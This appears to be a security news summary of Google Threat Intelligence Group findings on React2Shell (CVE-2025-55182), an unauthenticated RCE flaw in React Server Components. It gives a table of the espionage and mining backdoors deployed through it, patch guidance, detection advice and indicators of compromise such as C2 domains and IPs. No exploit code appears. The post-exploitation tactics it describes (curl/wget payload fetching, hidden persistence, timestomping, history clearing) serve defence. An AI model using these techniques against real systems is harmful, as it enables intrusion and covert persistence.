The CVE‑2025‑55182 “React2Shell” flaw in React Server Components unlocked unauthenticated remote code execution across thousands of Next.js sites. Within days, China‑nexus espionage groups, financial miners, and other threat actors deployed a suite of backdoors—MINOCAT, SNOWLIGHT, COMPOOD, HISONIC, and ANGRYREBEL.LINUX—turning the web framework into a launchpad for espionage and cryptocurrency mining.
React2Shell Exposed: How a Single RCE in React Server Components Became a Global Threat Actor Playground
On December 3, 2025, a critical unauthenticated remote code execution (RCE) vulnerability, CVE‑2025‑55182, was publicly disclosed in React Server Components (RSC). The flaw, dubbed React2Shell, allows an attacker to send a single crafted HTTP request that executes arbitrary code with the privileges of the web server process. With a CVSS v3.x score of 10.0 and a CVSS v4 score of 9.3, the vulnerability quickly became a high‑profile target for a spectrum of threat actors.
"CVE‑2025‑55182 is an unauthenticated RCE vulnerability in React Server Components with a CVSS v3.x score of 10.0 and a CVSS v4 score of 9.3…" – Google Threat Intelligence Group
The Vulnerable Packages
The flaw affects four specific RSC packages:
react-server-dom-webpack19.0‑19.2.0react-server-dom-parcel19.0‑19.2.0react-server-dom-turbopack19.0‑19.2.0
A patch to 19.0.1, 19.1.2, or 19.2.1 (or newer) removes the RCE vector. The same update also mitigates the information‑disclosure CVE‑2025‑55183.
Exploitation Landscape
Within days of disclosure, the Google Threat Intelligence Group (GTIG) observed a flurry of exploitation activity across multiple regions and industries. The attackers employed a variety of payloads and post‑compromise behaviors, underscoring the breadth of the threat.
China‑Nexus Espionage Clusters
| Actor | Payload | Post‑Exploitation | Targeted Infrastructure |
|---|---|---|---|
| Earth Lamia (UNC5454) | MINOCAT tunneler | Creates hidden dir $HOME/.systemd‑utils, kills ntpclient, installs cron and systemd services, and injects shell‑config hooks |
AWS, Alibaba Cloud (APAC) |
| Jackpot Panda | SNOWLIGHT downloader | Uses curl/wget to fetch a Go‑based backdoor, then contacts C2 reactcdn.windowserrorapis[.]com |
Global |
| UNC6588 | COMPOOD backdoor (masquerades as Vim) | Executes via wget, minimal follow‑on activity |
Global |
| UNC6603 | HISONIC backdoor | Uses Cloudflare Pages and GitLab for config retrieval, XOR‑encoded payload markers | AWS, Alibaba Cloud |
| UNC6595 | ANGRYREBEL.LINUX | Installs as sshd in /etc/, timestomps, clears shell history |
International VPS |
"The threat actor retrieved and executed a bash script used to create a hidden directory…" – GTIG
Financially Motivated Actors
Cryptocurrency miners were among the first to leverage the vulnerability. Starting December 5, GTIG documented the deployment of XMRig miners via a shell script (sex.sh) that also attempted to persist the miner as a systemd service.
Why This Matters
React and Next.js are ubiquitous in modern web stacks, powering everything from e‑commerce sites to enterprise intranets. The sheer number of exposed systems—combined with the ease of exploitation (no authentication required)—means that a single vulnerability can cascade into a global compromise.
Moreover, the rapid appearance of additional React CVEs (CVE‑2025‑55183, 55184, 67779) after the initial disclosure illustrates how a high‑visibility flaw can expose a broader attack surface, prompting attackers to probe for related weaknesses.
Defensive Recommendations
- Patch Immediately – Upgrade to at least
react-server-dom-*19.0.1/19.1.2/19.2.1. For DoS mitigations, use 19.2.3. - Deploy WAF Rules – Google Cloud Armor now offers a rule that detects and blocks exploitation attempts.
- Audit Dependencies – Verify whether vulnerable RSC packages are included in other applications.
- Monitor Network Traffic – Look for outbound
wget/curlcommands from web servers, especially to domains likereactcdn.windowserrorapis[.]com. - Hunt for Compromise – Search for hidden directories (
$HOME/.systemd‑utils), terminatedntpclientprocesses, and altered shell configuration files.
Indicators of Compromise
| Indicator | Type | Description |
|---|---|---|
reactcdn.windowserrorapis[.]com |
Domain | SNOWLIGHT C2 and staging server |
82.163.22.139 |
IP | SNOWLIGHT C2 |
216.158.232.43 |
IP | Staging server for sex.sh |
45.76.155.14 |
IP | COMPOOD C2 |
| SHA256 hashes of known samples (MINOCAT, COMPOOD, HISONIC, ANGRYREBEL, XMRig) | SHA256 | Sample binaries |
"Google has rolled out a Cloud Armor web application firewall (WAF) rule designed to detect and block exploitation attempts related to this vulnerability." – GTIG
Closing Thoughts
The React2Shell saga demonstrates how a flaw in a widely used open‑source library can be weaponized by both espionage and financially motivated actors at scale. Developers and security teams must treat such vulnerabilities not as isolated incidents but as a call to action: enforce rapid patching, monitor for subtle persistence mechanisms, and maintain a vigilant posture against the evolving threat landscape.
Source: Google Threat Intelligence Group – Threat Actors Exploit React2Shell (CVE‑2025‑55182)
Comments
Please log in or register to join the discussion